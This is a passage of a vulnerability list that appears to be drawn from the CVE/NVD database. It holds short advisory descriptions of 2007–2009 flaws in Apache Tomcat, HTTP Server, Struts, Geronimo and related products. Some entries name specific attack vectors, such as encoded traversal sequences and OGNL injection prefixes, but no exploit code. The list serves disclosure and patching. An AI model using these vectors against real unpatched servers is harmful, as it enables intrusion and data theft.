10540| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
10541| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
10542| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
10543| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
10544| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
10545| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
10546| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
10547| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
10548| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
10549| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
10550| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
10551| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
10552| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
10553| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
10554| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
10555| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
10556| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
10557| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
10558| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
10559| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
10560| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
10561| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
10562| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
10563| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
10564| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
10565| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
10566| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
10567| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
10568| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
10569| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
10570| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
10571| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
10572| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
10573| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
10574| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
10575| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
10576| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
10577| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
10578| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
10579| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
10580| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
10581| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
10582| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
10583| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
10584| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
10585| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
10586| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
10587| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
10588| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
10589| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
10590| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
10591| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
10592| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
10593| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
10594| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
10595| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
10596| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
10597| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
10598| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
10599| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
10600| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
10601| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
10602| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
10603| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
10604| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
10605| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
10606| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
10607| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
10608| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
10609| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
10610| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
10611| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
10612| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
10613| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
10614| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
10615| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
10616| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
10617| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
10618| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
10619| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
10620| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
10621| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
10622| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
10623| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
10624| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
10625| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
10626| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
10627| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
10628| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
10629| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
10630| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
10631| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
10632| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
10633| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
10634| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
10635| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
10636| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
10637| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
10638| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
10639| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
10640| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
10641| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
10642| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
10643| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
10644| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
10645| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
10646| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
10647| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
10648| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
